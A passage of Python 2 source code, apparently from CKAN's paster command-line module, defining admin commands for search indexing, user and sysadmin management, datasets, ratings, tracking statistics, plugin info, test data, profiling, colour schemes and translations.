commit()
def check(self):
from ckan.lib.search import check
check()
def show(self):
from ckan.lib.search import show
if not len(self.args) == 2:
print 'Missing parameter: dataset-name'
return
index = show(self.args[1])
pprint(index)
def clear(self):
from ckan.lib.search import clear, clear_all
package_id = self.args[1] if len(self.args) > 1 else None
if not package_id:
clear_all()
else:
clear(package_id)
def rebuild_fast(self):
### Get out config but without starting pylons environment ####
conf = self._get_config()
### Get ids using own engine, otherwise multiprocess will balk
db_url = conf['sqlalchemy.url']
engine = sa.create_engine(db_url)
package_ids = []
result = engine.execute("select id from package where state = 'active';")
for row in result:
package_ids.append(row[0])
def start(ids):
## load actual enviroment for each subprocess, so each have thier own
## sa session
self._load_config()
from ckan.lib.search import rebuild, commit
rebuild(package_ids=ids)
commit()
def chunks(l, n):
""" Yield n successive chunks from l.
"""
newn = int(len(l) / n)
for i in xrange(0, n-1):
yield l[i*newn:i*newn+newn]
yield l[n*newn-newn:]
processes = []
for chunk in chunks(package_ids, mp.cpu_count()):
process = mp.Process(target=start, args=(chunk,))
processes.append(process)
process.daemon = True
process.start()
for process in processes:
process.join()
class Notification(CkanCommand):
'''Send out modification notifications.
In "replay" mode, an update signal is sent for each dataset in the database.
Usage:
notify replay - send out modification signals
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 1
min_args = 0
def command(self):
self._load_config()
from ckan.model import Session, Package, DomainObjectOperation
from ckan.model.modification import DomainObjectModificationExtension
if not self.args:
# default to run
cmd = 'replay'
else:
cmd = self.args[0]
if cmd == 'replay':
dome = DomainObjectModificationExtension()
for package in Session.query(Package):
dome.notify(package, DomainObjectOperation.changed)
else:
print 'Command %s not recognized' % cmd
class RDFExport(CkanCommand):
'''Export active datasets as RDF
This command dumps out all currently active datasets as RDF into the
specified folder.
Usage:
paster rdf-export /path/to/store/output
'''
summary = __doc__.split('\n')[0]
usage = __doc__
def command(self):
self._load_config()
if not self.args:
# default to run
print RDFExport.__doc__
else:
self.export_datasets(self.args[0])
def export_datasets(self, out_folder):
'''
Export datasets as RDF to an output folder.
'''
import urlparse
import urllib2
from ckan.common import config
import ckan.model as model
import ckan.logic as logic
import ckan.lib.helpers as h
# Create output folder if not exists
if not os.path.isdir(out_folder):
os.makedirs(out_folder)
fetch_url = config['ckan.site_url']
user = logic.get_action('get_site_user')({'model': model, 'ignore_auth': True}, {})
context = {'model': model, 'session': model.Session, 'user': user['name']}
dataset_names = logic.get_action('package_list')(context, {})
for dataset_name in dataset_names:
dd = logic.get_action('package_show')(context, {'id': dataset_name})
if not dd['state'] == 'active':
continue
url = h.url_for(controller='package', action='read', id=dd['name'])
url = urlparse.urljoin(fetch_url, url[1:]) + '.rdf'
try:
fname = os.path.join(out_folder, dd['name']) + ".rdf"
try:
r = urllib2.urlopen(url).read()
except urllib2.HTTPError, e:
if e.code == 404:
error('Please install ckanext-dcat and enable the ' +
'`dcat` plugin to use the RDF serializations')
with open(fname, 'wb') as f:
f.write(r)
except IOError, ioe:
sys.stderr.write(str(ioe) + "\n")
class Sysadmin(CkanCommand):
'''Gives sysadmin rights to a named user
Usage:
sysadmin - lists sysadmins
sysadmin list - lists sysadmins
sysadmin add USERNAME - add a user as a sysadmin
sysadmin remove USERNAME - removes user from sysadmins
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 2
min_args = 0
def command(self):
self._load_config()
import ckan.model as model
cmd = self.args[0] if self.args else None
if cmd is None or cmd == 'list':
self.list()
elif cmd == 'add':
self.add()
elif cmd == 'remove':
self.remove()
else:
print 'Command %s not recognized' % cmd
def list(self):
import ckan.model as model
print 'Sysadmins:'
sysadmins = model.Session.query(model.User).filter_by(sysadmin=True,
state='active')
print 'count = %i' % sysadmins.count()
for sysadmin in sysadmins:
print '%s name=%s id=%s' % (sysadmin.__class__.__name__,
sysadmin.name,
sysadmin.id)
def add(self):
import ckan.model as model
if len(self.args) < 2:
print 'Need name of the user to be made sysadmin.'
return
username = self.args[1]
user = model.User.by_name(unicode(username))
if not user:
print 'User "%s" not found' % username
makeuser = raw_input('Create new user: %s? [y/n]' % username)
if makeuser == 'y':
password = UserCmd.password_prompt()
print('Creating %s user' % username)
user = model.User(name=unicode(username),
password=password)
else:
print 'Exiting ...'
return
user.sysadmin = True
model.Session.add(user)
model.repo.commit_and_remove()
print 'Added %s as sysadmin' % username
def remove(self):
import ckan.model as model
if len(self.args) < 2:
print 'Need name of the user to be made sysadmin.'
return
username = self.args[1]
user = model.User.by_name(unicode(username))
if not user:
print 'Error: user "%s" not found!' % username
return
user.sysadmin = False
model.repo.commit_and_remove()
class UserCmd(CkanCommand):
'''Manage users
Usage:
user - lists users
user list - lists users
user USERNAME - shows user properties
user add USERNAME [FIELD1=VALUE1 FIELD2=VALUE2 ...]
- add a user (prompts for password
if not supplied).
Field can be: apikey
password
email
user setpass USERNAME - set user password (prompts)
user remove USERNAME - removes user from users
user search QUERY - searches for a user name
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = None
min_args = 0
def command(self):
self._load_config()
import ckan.model as model
if not self.args:
self.list()
else:
cmd = self.args[0]
if cmd == 'add':
self.add()
elif cmd == 'remove':
self.remove()
elif cmd == 'search':
self.search()
elif cmd == 'setpass':
self.setpass()
elif cmd == 'list':
self.list()
else:
self.show()
def get_user_str(self, user):
user_str = 'name=%s' % user.name
if user.name != user.display_name:
user_str += ' display=%s' % user.display_name
return user_str
def list(self):
import ckan.model as model
print 'Users:'
users = model.Session.query(model.User).filter_by(state='active')
print 'count = %i' % users.count()
for user in users:
print self.get_user_str(user)
def show(self):
import ckan.model as model
username = self.args[0]
user = model.User.get(unicode(username))
print 'User: \n', user
def setpass(self):
import ckan.model as model
if len(self.args) < 2:
print 'Need name of the user.'
return
username = self.args[1]
user = model.User.get(username)
print('Editing user: %r' % user.name)
password = self.password_prompt()
user.password = password
model.repo.commit_and_remove()
print 'Done'
def search(self):
import ckan.model as model
if len(self.args) < 2:
print 'Need user name query string.'
return
query_str = self.args[1]
query = model.User.search(query_str)
print '%i users matching %r:' % (query.count(), query_str)
for user in query.all():
print self.get_user_str(user)
@classmethod
def password_prompt(cls):
import getpass
password1 = None
while not password1:
password1 = getpass.getpass('Password: ')
password2 = getpass.getpass('Confirm password: ')
if password1 != password2:
error('Passwords do not match')
return password1
def add(self):
import ckan.model as model
if len(self.args) < 2:
error('Need name of the user.')
username = self.args[1]
# parse args into data_dict
data_dict = {'name': username}
for arg in self.args[2:]:
try:
field, value = arg.split('=', 1)
data_dict[field] = value
except ValueError:
raise ValueError('Could not parse arg: %r (expected "<option>=<value>)"' % arg)
if 'password' not in data_dict:
data_dict['password'] = self.password_prompt()
if 'fullname' in data_dict:
data_dict['fullname'] = data_dict['fullname'].decode(sys.getfilesystemencoding())
print('Creating user: %r' % username)
try:
import ckan.logic as logic
site_user = logic.get_action('get_site_user')({'model': model, 'ignore_auth': True}, {})
context = {
'model': model,
'session': model.Session,
'ignore_auth': True,
'user': site_user['name'],
}
user_dict = logic.get_action('user_create')(context, data_dict)
pprint(user_dict)
except logic.ValidationError, e:
error(e)
def remove(self):
import ckan.model as model
if len(self.args) < 2:
print 'Need name of the user.'
return
username = self.args[1]
p.toolkit.get_action('user_delete')(
{'model': model, 'ignore_auth': True},
{'id': username})
print('Deleted user: %s' % username)
class DatasetCmd(CkanCommand):
'''Manage datasets
Usage:
dataset DATASET_NAME|ID - shows dataset properties
dataset show DATASET_NAME|ID - shows dataset properties
dataset list - lists datasets
dataset delete [DATASET_NAME|ID] - changes dataset state to 'deleted'
dataset purge [DATASET_NAME|ID] - removes dataset from db entirely
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 3
min_args = 0
def command(self):
self._load_config()
if not self.args:
print self.usage
else:
cmd = self.args[0]
if cmd == 'delete':
self.delete(self.args[1])
elif cmd == 'purge':
self.purge(self.args[1])
elif cmd == 'list':
self.list()
elif cmd == 'show':
self.show(self.args[1])
else:
self.show(self.args[0])
def list(self):
import ckan.model as model
print 'Datasets:'
datasets = model.Session.query(model.Package)
print 'count = %i' % datasets.count()
for dataset in datasets:
state = ('(%s)' % dataset.state) if dataset.state != 'active' else ''
print '%s %s %s' % (dataset.id, dataset.name, state)
def _get_dataset(self, dataset_ref):
import ckan.model as model
dataset = model.Package.get(unicode(dataset_ref))
assert dataset, 'Could not find dataset matching reference: %r' % dataset_ref
return dataset
def show(self, dataset_ref):
import pprint
dataset = self._get_dataset(dataset_ref)
pprint.pprint(dataset.as_dict())
def delete(self, dataset_ref):
import ckan.model as model
dataset = self._get_dataset(dataset_ref)
old_state = dataset.state
rev = model.repo.new_revision()
dataset.delete()
model.repo.commit_and_remove()
dataset = self._get_dataset(dataset_ref)
print '%s %s -> %s' % (dataset.name, old_state, dataset.state)
def purge(self, dataset_ref):
import ckan.logic as logic
dataset = self._get_dataset(dataset_ref)
name = dataset.name
site_user = logic.get_action('get_site_user')({'ignore_auth': True}, {})
context = {'user': site_user['name']}
logic.get_action('dataset_purge')(
context, {'id': dataset_ref})
print '%s purged' % name
class Celery(CkanCommand):
'''Celery daemon [DEPRECATED]
This command is DEPRECATED, use `paster jobs` instead.
Usage:
celeryd <run> - run the celery daemon
celeryd run concurrency - run the celery daemon with
argument 'concurrency'
celeryd view - view all tasks in the queue
celeryd clean - delete all tasks in the queue
'''
min_args = 0
max_args = 2
summary = __doc__.split('\n')[0]
usage = __doc__
def command(self):
if not self.args:
self.run_()
else:
cmd = self.args[0]
if cmd == 'run':
self.run_()
elif cmd == 'view':
self.view()
elif cmd == 'clean':
self.clean()
else:
error('Command %s not recognized' % cmd)
def run_(self):
deprecation_warning(u'Use `paster jobs worker` instead.')
default_ini = os.path.join(os.getcwd(), 'development.ini')
if self.options.config:
os.environ['CKAN_CONFIG'] = os.path.abspath(self.options.config)
elif os.path.isfile(default_ini):
os.environ['CKAN_CONFIG'] = default_ini
else:
error('No .ini specified and none was found in current directory')
from ckan.lib.celery_app import celery
celery_args = []
if len(self.args) == 2 and self.args[1] == 'concurrency':
celery_args.append['--concurrency=1']
celery.worker_main(argv=['celeryd', '--loglevel=INFO'] + celery_args)
def view(self):
deprecation_warning(u'Use `paster jobs list` instead.')
self._load_config()
import ckan.model as model
from kombu.transport.sqlalchemy.models import Message
q = model.Session.query(Message)
q_visible = q.filter_by(visible=True)
print '%i messages (total)' % q.count()
print '%i visible messages' % q_visible.count()
for message in q:
if message.visible:
print '%i: Visible' % (message.id)
else:
print '%i: Invisible Sent:%s' % (message.id, message.sent_at)
def clean(self):
deprecation_warning(u'Use `paster jobs clear` instead.')
self._load_config()
import ckan.model as model
query = model.Session.execute("select * from kombu_message")
tasks_initially = query.rowcount
if not tasks_initially:
print 'No tasks to delete'
sys.exit(0)
query = model.Session.execute("delete from kombu_message")
query = model.Session.execute("select * from kombu_message")
tasks_afterwards = query.rowcount
print '%i of %i tasks deleted' % (tasks_initially - tasks_afterwards,
tasks_initially)
if tasks_afterwards:
error('Failed to delete all tasks')
model.repo.commit_and_remove()
class Ratings(CkanCommand):
'''Manage the ratings stored in the db
Usage:
ratings count - counts ratings
ratings clean - remove all ratings
ratings clean-anonymous - remove only anonymous ratings
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 1
min_args = 1
def command(self):
self._load_config()
import ckan.model as model
cmd = self.args[0]
if cmd == 'count':
self.count()
elif cmd == 'clean':
self.clean()
elif cmd == 'clean-anonymous':
self.clean(user_ratings=False)
else:
print 'Command %s not recognized' % cmd
def count(self):
import ckan.model as model
q = model.Session.query(model.Rating)
print "%i ratings" % q.count()
q = q.filter(model.Rating.user_id is None)
print "of which %i are anonymous ratings" % q.count()
def clean(self, user_ratings=True):
import ckan.model as model
q = model.Session.query(model.Rating)
print "%i ratings" % q.count()
if not user_ratings:
q = q.filter(model.Rating.user_id is None)
print "of which %i are anonymous ratings" % q.count()
ratings = q.all()
for rating in ratings:
rating.purge()
model.repo.commit_and_remove()
## Used by the Tracking class
_ViewCount = collections.namedtuple("ViewCount", "id name count")
class Tracking(CkanCommand):
'''Update tracking statistics
Usage:
tracking update [start_date] - update tracking stats
tracking export FILE [start_date] - export tracking stats to a csv file
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 3
min_args = 1
def command(self):
self._load_config()
import ckan.model as model
engine = model.meta.engine
cmd = self.args[0]
if cmd == 'update':
start_date = self.args[1] if len(self.args) > 1 else None
self.update_all(engine, start_date)
elif cmd == 'export':
if len(self.args) <= 1:
error(self.__class__.__doc__)
output_file = self.args[1]
start_date = self.args[2] if len(self.args) > 2 else None
self.update_all(engine, start_date)
self.export_tracking(engine, output_file)
else:
error(self.__class__.__doc__)
def update_all(self, engine, start_date=None):
if start_date:
start_date = datetime.datetime.strptime(start_date, '%Y-%m-%d')
else:
# No date given. See when we last have data for and get data
# from 2 days before then in case new data is available.
# If no date here then use 2011-01-01 as the start date
sql = '''SELECT tracking_date from tracking_summary
ORDER BY tracking_date DESC LIMIT 1;'''
result = engine.execute(sql).fetchall()
if result:
start_date = result[0]['tracking_date']
start_date += datetime.timedelta(-2)
# convert date to datetime
combine = datetime.datetime.combine
start_date = combine(start_date, datetime.time(0))
else:
start_date = datetime.datetime(2011, 1, 1)
start_date_solrsync = start_date
end_date = datetime.datetime.now()
while start_date < end_date:
stop_date = start_date + datetime.timedelta(1)
self.update_tracking(engine, start_date)
print 'tracking updated for %s' % start_date
start_date = stop_date
self.update_tracking_solr(engine, start_date_solrsync)
def _total_views(self, engine):
sql = '''
SELECT p.id,
p.name,
COALESCE(SUM(s.count), 0) AS total_views
FROM package AS p
LEFT OUTER JOIN tracking_summary AS s ON s.package_id = p.id
GROUP BY p.id, p.name
ORDER BY total_views DESC
'''
return [_ViewCount(*t) for t in engine.execute(sql).fetchall()]
def _recent_views(self, engine, measure_from):
sql = '''
SELECT p.id,
p.name,
COALESCE(SUM(s.count), 0) AS total_views
FROM package AS p
LEFT OUTER JOIN tracking_summary AS s ON s.package_id = p.id
WHERE s.tracking_date >= %(measure_from)s
GROUP BY p.id, p.name
ORDER BY total_views DESC
'''
return [_ViewCount(*t) for t in engine.execute(sql, measure_from=str(measure_from)).fetchall()]
def export_tracking(self, engine, output_filename):
'''Write tracking summary to a csv file.'''
HEADINGS = [
"dataset id",
"dataset name",
"total views",
"recent views (last 2 weeks)",
]
measure_from = datetime.date.today() - datetime.timedelta(days=14)
recent_views = self._recent_views(engine, measure_from)
total_views = self._total_views(engine)
with open(output_filename, 'w') as fh:
f_out = csv.writer(fh)
f_out.writerow(HEADINGS)
recent_views_for_id = dict((r.id, r.count) for r in recent_views)
f_out.writerows([(r.id,
r.name,
r.count,
recent_views_for_id.get(r.id, 0))
for r in total_views])
def update_tracking(self, engine, summary_date):
PACKAGE_URL = '/dataset/'
# clear out existing data before adding new
sql = '''DELETE FROM tracking_summary
WHERE tracking_date='%s'; ''' % summary_date
engine.execute(sql)
sql = '''SELECT DISTINCT url, user_key,
CAST(access_timestamp AS Date) AS tracking_date,
tracking_type INTO tracking_tmp
FROM tracking_raw
WHERE CAST(access_timestamp as Date)=%s;
INSERT INTO tracking_summary
(url, count, tracking_date, tracking_type)
SELECT url, count(user_key), tracking_date, tracking_type
FROM tracking_tmp
GROUP BY url, tracking_date, tracking_type;
DROP TABLE tracking_tmp;
COMMIT;'''
engine.execute(sql, summary_date)
# get ids for dataset urls
sql = '''UPDATE tracking_summary t
SET package_id = COALESCE(
(SELECT id FROM package p
WHERE p.name = regexp_replace(' ' || t.url, '^[ ]{1}(/\w{2}){0,1}' || %s, ''))
,'~~not~found~~')
WHERE t.package_id IS NULL
AND tracking_type = 'page';'''
engine.execute(sql, PACKAGE_URL)
# update summary totals for resources
sql = '''UPDATE tracking_summary t1
SET running_total = (
SELECT sum(count)
FROM tracking_summary t2
WHERE t1.url = t2.url
AND t2.tracking_date <= t1.tracking_date
)
,recent_views = (
SELECT sum(count)
FROM tracking_summary t2
WHERE t1.url = t2.url
AND t2.tracking_date <= t1.tracking_date AND t2.tracking_date >= t1.tracking_date - 14
)
WHERE t1.running_total = 0 AND tracking_type = 'resource';'''
engine.execute(sql)
# update summary totals for pages
sql = '''UPDATE tracking_summary t1
SET running_total = (
SELECT sum(count)
FROM tracking_summary t2
WHERE t1.package_id = t2.package_id
AND t2.tracking_date <= t1.tracking_date
)
,recent_views = (
SELECT sum(count)
FROM tracking_summary t2
WHERE t1.package_id = t2.package_id
AND t2.tracking_date <= t1.tracking_date AND t2.tracking_date >= t1.tracking_date - 14
)
WHERE t1.running_total = 0 AND tracking_type = 'page'
AND t1.package_id IS NOT NULL
AND t1.package_id != '~~not~found~~';'''
engine.execute(sql)
def update_tracking_solr(self, engine, start_date):
sql = '''SELECT package_id FROM tracking_summary
where package_id!='~~not~found~~'
and tracking_date >= %s;'''
results = engine.execute(sql, start_date)
package_ids = set()
for row in results:
package_ids.add(row['package_id'])
total = len(package_ids)
not_found = 0
print '%i package index%s to be rebuilt starting from %s' % (total, '' if total < 2 else 'es', start_date)
from ckan.lib.search import rebuild
for package_id in package_ids:
try:
rebuild(package_id)
except logic.NotFound:
print "Error: package %s not found." % (package_id)
not_found += 1
except KeyboardInterrupt:
print "Stopped."
return
except:
raise
print 'search index rebuilding done.' + (' %i not found.' % (not_found) if not_found else "")
class PluginInfo(CkanCommand):
'''Provide info on installed plugins.
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 0
min_args = 0
def command(self):
self.get_info()
def get_info(self):
''' print info about current plugins from the .ini file'''
import ckan.plugins as p
self._load_config()
interfaces = {}
plugins = {}
for name in dir(p):
item = getattr(p, name)
try:
if issubclass(item, p.Interface):
interfaces[item] = {'class': item}
except TypeError:
pass
for interface in interfaces:
for plugin in p.PluginImplementations(interface):
name = plugin.name
if name not in plugins:
plugins[name] = {'doc': plugin.__doc__,
'class': plugin,
'implements': []}
plugins[name]['implements'].append(interface.__name__)
for plugin in plugins:
p = plugins[plugin]
print plugin + ':'
print '-' * (len(plugin) + 1)
if p['doc']:
print p['doc']
print 'Implements:'
for i in p['implements']:
extra = None
if i == 'ITemplateHelpers':
extra = self.template_helpers(p['class'])
if i == 'IActions':
extra = self.actions(p['class'])
print ' %s' % i
if extra:
print extra
print
def actions(self, cls):
''' Return readable action function info. '''
actions = cls.get_actions()
return self.function_info(actions)
def template_helpers(self, cls):
''' Return readable helper function info. '''
helpers = cls.get_helpers()
return self.function_info(helpers)
def function_info(self, functions):
''' Take a dict of functions and output readable info '''
import inspect
output = []
for function_name in functions:
fn = functions[function_name]
args_info = inspect.getargspec(fn)
params = args_info.args
num_params = len(params)
if args_info.varargs:
params.append('*' + args_info.varargs)
if args_info.keywords:
params.append('**' + args_info.keywords)
if args_info.defaults:
offset = num_params - len(args_info.defaults)
for i, v in enumerate(args_info.defaults):
params[i + offset] = params[i + offset] + '=' + repr(v)
# is this a classmethod if so remove the first parameter
if inspect.ismethod(fn) and inspect.isclass(fn.__self__):
params = params[1:]
params = ', '.join(params)
output.append(' %s(%s)' % (function_name, params))
# doc string
if fn.__doc__:
bits = fn.__doc__.split('\n')
for bit in bits:
output.append(' %s' % bit)
return ('\n').join(output)
class CreateTestDataCommand(CkanCommand):
'''Create test data in the database.
Tests can also delete the created objects easily with the delete() method.
create-test-data - annakarenina and warandpeace
create-test-data search - realistic data to test search
create-test-data gov - government style data
create-test-data family - package relationships data
create-test-data user - create a user 'tester' with api key 'tester'
create-test-data translations - annakarenina, warandpeace, and some test
translations of terms
create-test-data vocabs - annakerenina, warandpeace, and some test
vocabularies
create-test-data hierarchy - hierarchy of groups
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 1
min_args = 0
def command(self):
self._load_config()
self._setup_app()
from ckan import plugins
from create_test_data import CreateTestData
if self.args:
cmd = self.args[0]
else:
cmd = 'basic'
if self.verbose:
print 'Creating %s test data' % cmd
if cmd == 'basic':
CreateTestData.create_basic_test_data()
elif cmd == 'user':
CreateTestData.create_test_user()
print 'Created user %r with password %r and apikey %r' % ('tester',
'tester', 'tester')
elif cmd == 'search':
CreateTestData.create_search_test_data()
elif cmd == 'gov':
CreateTestData.create_gov_test_data()
elif cmd == 'family':
CreateTestData.create_family_test_data()
elif cmd == 'translations':
CreateTestData.create_translations_test_data()
elif cmd == 'vocabs':
CreateTestData.create_vocabs_test_data()
elif cmd == 'hierarchy':
CreateTestData.create_group_hierarchy_test_data()
else:
print 'Command %s not recognized' % cmd
raise NotImplementedError
if self.verbose:
print 'Creating %s test data: Complete!' % cmd
class Profile(CkanCommand):
'''Code speed profiler
Provide a ckan url and it will make the request and record
how long each function call took in a file that can be read
by pstats.Stats (command-line) or runsnakerun (gui).
Usage:
profile URL [username]
e.g. profile /data/search
The result is saved in profile.data.search
To view the profile in runsnakerun:
runsnakerun ckan.data.search.profile
You may need to install python module: cProfile
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 2
min_args = 1
def _load_config_into_test_app(self):
from paste.deploy import loadapp
import paste.fixture
if not self.options.config:
msg = 'No config file supplied'
raise self.BadCommand(msg)
self.filename = os.path.abspath(self.options.config)
if not os.path.exists(self.filename):
raise AssertionError('Config filename %r does not exist.' % self.filename)
fileConfig(self.filename)
wsgiapp = loadapp('config:' + self.filename)
self.app = paste.fixture.TestApp(wsgiapp)
def command(self):
self._load_config_into_test_app()
import paste.fixture
import cProfile
import re
url = self.args[0]
if self.args[1:]:
user = self.args[1]
else:
user = 'visitor'
def profile_url(url):
try:
res = self.app.get(url, status=[200],
extra_environ={'REMOTE_USER': user})
except paste.fixture.AppError:
print 'App error: ', url.strip()
except KeyboardInterrupt:
raise
except:
import traceback
traceback.print_exc()
print 'Unknown error: ', url.strip()
output_filename = 'ckan%s.profile' % re.sub('[/?]', '.', url.replace('/', '.'))
profile_command = "profile_url('%s')" % url
cProfile.runctx(profile_command, globals(), locals(), filename=output_filename)
import pstats
stats = pstats.Stats(output_filename)
stats.sort_stats('cumulative')
stats.print_stats(0.1) # show only top 10% of lines
print 'Only top 10% of lines shown'
print 'Written profile to: %s' % output_filename
class CreateColorSchemeCommand(CkanCommand):
'''Create or remove a color scheme.
After running this, you'll need to regenerate the css files. See paster's less command for details.
color - creates a random color scheme
color clear - clears any color scheme
color <'HEX'> - uses as base color eg '#ff00ff' must be quoted.
color <VALUE> - a float between 0.0 and 1.0 used as base hue
color <COLOR_NAME> - html color name used for base color eg lightblue
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 1
min_args = 0
rules = [
'@layoutLinkColor',
'@mastheadBackgroundColor',
'@btnPrimaryBackground',
'@btnPrimaryBackgroundHighlight',
]
# list of predefined colors
color_list = {
'aliceblue': '#f0fff8',
'antiquewhite': '#faebd7',
'aqua': '#00ffff',
'aquamarine': '#7fffd4',
'azure': '#f0ffff',
'beige': '#f5f5dc',
'bisque': '#ffe4c4',
'black': '#000000',
'blanchedalmond': '#ffebcd',
'blue': '#0000ff',
'blueviolet': '#8a2be2',
'brown': '#a52a2a',
'burlywood': '#deb887',
'cadetblue': '#5f9ea0',
'chartreuse': '#7fff00',
'chocolate': '#d2691e',
'coral': '#ff7f50',
'cornflowerblue': '#6495ed',
'cornsilk': '#fff8dc',
'crimson': '#dc143c',
'cyan': '#00ffff',
'darkblue': '#00008b',
'darkcyan': '#008b8b',
'darkgoldenrod': '#b8860b',
'darkgray': '#a9a9a9',
'darkgrey': '#a9a9a9',
'darkgreen': '#006400',
'darkkhaki': '#bdb76b',
'darkmagenta': '#8b008b',
'darkolivegreen': '#556b2f',
'darkorange': '#ff8c00',
'darkorchid': '#9932cc',
'darkred': '#8b0000',
'darksalmon': '#e9967a',
'darkseagreen': '#8fbc8f',
'darkslateblue': '#483d8b',
'darkslategray': '#2f4f4f',
'darkslategrey': '#2f4f4f',
'darkturquoise': '#00ced1',
'darkviolet': '#9400d3',
'deeppink': '#ff1493',
'deepskyblue': '#00bfff',
'dimgray': '#696969',
'dimgrey': '#696969',
'dodgerblue': '#1e90ff',
'firebrick': '#b22222',
'floralwhite': '#fffaf0',
'forestgreen': '#228b22',
'fuchsia': '#ff00ff',
'gainsboro': '#dcdcdc',
'ghostwhite': '#f8f8ff',
'gold': '#ffd700',
'goldenrod': '#daa520',
'gray': '#808080',
'grey': '#808080',
'green': '#008000',
'greenyellow': '#adff2f',
'honeydew': '#f0fff0',
'hotpink': '#ff69b4',
'indianred ': '#cd5c5c',
'indigo ': '#4b0082',
'ivory': '#fffff0',
'khaki': '#f0e68c',
'lavender': '#e6e6fa',
'lavenderblush': '#fff0f5',
'lawngreen': '#7cfc00',
'lemonchiffon': '#fffacd',
'lightblue': '#add8e6',
'lightcoral': '#f08080',
'lightcyan': '#e0ffff',
'lightgoldenrodyellow': '#fafad2',
'lightgray': '#d3d3d3',
'lightgrey': '#d3d3d3',
'lightgreen': '#90ee90',
'lightpink': '#ffb6c1',
'lightsalmon': '#ffa07a',
'lightseagreen': '#20b2aa',
'lightskyblue': '#87cefa',
'lightslategray': '#778899',
'lightslategrey': '#778899',
'lightsteelblue': '#b0c4de',
'lightyellow': '#ffffe0',
'lime': '#00ff00',
'limegreen': '#32cd32',
'linen': '#faf0e6',
'magenta': '#ff00ff',
'maroon': '#800000',
'mediumaquamarine': '#66cdaa',
'mediumblue': '#0000cd',
'mediumorchid': '#ba55d3',
'mediumpurple': '#9370d8',
'mediumseagreen': '#3cb371',
'mediumslateblue': '#7b68ee',
'mediumspringgreen': '#00fa9a',
'mediumturquoise': '#48d1cc',
'mediumvioletred': '#c71585',
'midnightblue': '#191970',
'mintcream': '#f5fffa',
'mistyrose': '#ffe4e1',
'moccasin': '#ffe4b5',
'navajowhite': '#ffdead',
'navy': '#000080',
'oldlace': '#fdf5e6',
'olive': '#808000',
'olivedrab': '#6b8e23',
'orange': '#ffa500',
'orangered': '#ff4500',
'orchid': '#da70d6',
'palegoldenrod': '#eee8aa',
'palegreen': '#98fb98',
'paleturquoise': '#afeeee',
'palevioletred': '#d87093',
'papayawhip': '#ffefd5',
'peachpuff': '#ffdab9',
'peru': '#cd853f',
'pink': '#ffc0cb',
'plum': '#dda0dd',
'powderblue': '#b0e0e6',
'purple': '#800080',
'red': '#ff0000',
'rosybrown': '#bc8f8f',
'royalblue': '#4169e1',
'saddlebrown': '#8b4513',
'salmon': '#fa8072',
'sandybrown': '#f4a460',
'seagreen': '#2e8b57',
'seashell': '#fff5ee',
'sienna': '#a0522d',
'silver': '#c0c0c0',
'skyblue': '#87ceeb',
'slateblue': '#6a5acd',
'slategray': '#708090',
'slategrey': '#708090',
'snow': '#fffafa',
'springgreen': '#00ff7f',
'steelblue': '#4682b4',
'tan': '#d2b48c',
'teal': '#008080',
'thistle': '#d8bfd8',
'tomato': '#ff6347',
'turquoise': '#40e0d0',
'violet': '#ee82ee',
'wheat': '#f5deb3',
'white': '#ffffff',
'whitesmoke': '#f5f5f5',
'yellow': '#ffff00',
'yellowgreen': '#9acd32',
}
def create_colors(self, hue, num_colors=5, saturation=None, lightness=None):
if saturation is None:
saturation = 0.9
if lightness is None:
lightness = 40
else:
lightness *= 100
import math
saturation -= math.trunc(saturation)
print hue, saturation
import colorsys
''' Create n related colours '''
colors = []
for i in xrange(num_colors):
ix = i * (1.0/num_colors)
_lightness = (lightness + (ix * 40))/100.
if _lightness > 1.0:
_lightness = 1.0
color = colorsys.hls_to_rgb(hue, _lightness, saturation)
hex_color = '#'
for part in color:
hex_color += '%02x' % int(part * 255)
# check and remove any bad values
if not re.match('^\#[0-9a-f]{6}$', hex_color):
hex_color = '#FFFFFF'
colors.append(hex_color)
return colors
def command(self):
hue = None
saturation = None
lightness = None
path = os.path.dirname(__file__)
path = os.path.join(path, '..', 'public', 'base', 'less', 'custom.less')
if self.args:
arg = self.args[0]
rgb = None
if arg == 'clear':
os.remove(path)
print 'custom colors removed.'
elif arg.startswith('#'):
color = arg[1:]
if len(color) == 3:
rgb = [int(x, 16) * 16 for x in color]
elif len(color) == 6:
rgb = [int(x, 16) for x in re.findall('..', color)]
else:
print 'ERROR: invalid color'
elif arg.lower() in self.color_list:
color = self.color_list[arg.lower()][1:]
rgb = [int(x, 16) for x in re.findall('..', color)]
else:
try:
hue = float(self.args[0])
except ValueError:
print 'ERROR argument `%s` not recognised' % arg
if rgb:
import colorsys
hue, lightness, saturation = colorsys.rgb_to_hls(*rgb)
lightness = lightness / 340
# deal with greys
if not (hue == 0.0 and saturation == 0.0):
saturation = None
else:
import random
hue = random.random()
if hue is not None:
f = open(path, 'w')
colors = self.create_colors(hue, saturation=saturation, lightness=lightness)
for i in xrange(len(self.rules)):
f.write('%s: %s;\n' % (self.rules[i], colors[i]))
print '%s: %s;\n' % (self.rules[i], colors[i])
f.close
print 'Color scheme has been created.'
print 'Make sure less is run for changes to take effect.'
class TranslationsCommand(CkanCommand):
'''Translation helper functions
trans js - generate the javascript translations
trans mangle - mangle the zh_TW translations for testing
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 1
min_args = 1
def command(self):
self._load_config()
from ckan.common import config
from ckan.lib.i18n import build_js_translations
ckan_path = os.path.join(os.path.dirname(__file__), '..')
self.i18n_path = config.get('ckan.i18n_directory',
os.path.join(ckan_path, 'i18n'))
command = self.args[0]
if command == 'mangle':
self.mangle_po()
elif command == 'js':
build_js_translations()
else:
print 'command not recognised'
def mangle_po(self):
''' This will mangle the zh_TW translations for translation coverage
testing.
NOTE: This will destroy the current translations fot zh_TW
'''
import polib
pot_path = os.path.join(self.i18n_path, 'ckan.pot')
po = polib.pofile(pot_path)
# we don't want to mangle the following items in strings
# %(...)s %s %0.3f %1$s %2$0.3f [1:...] {...} etc
# sprintf bit after %
spf_reg_ex = "\+?(0|'.)?-?\d*(.\d*)?[\%bcdeufosxX]"
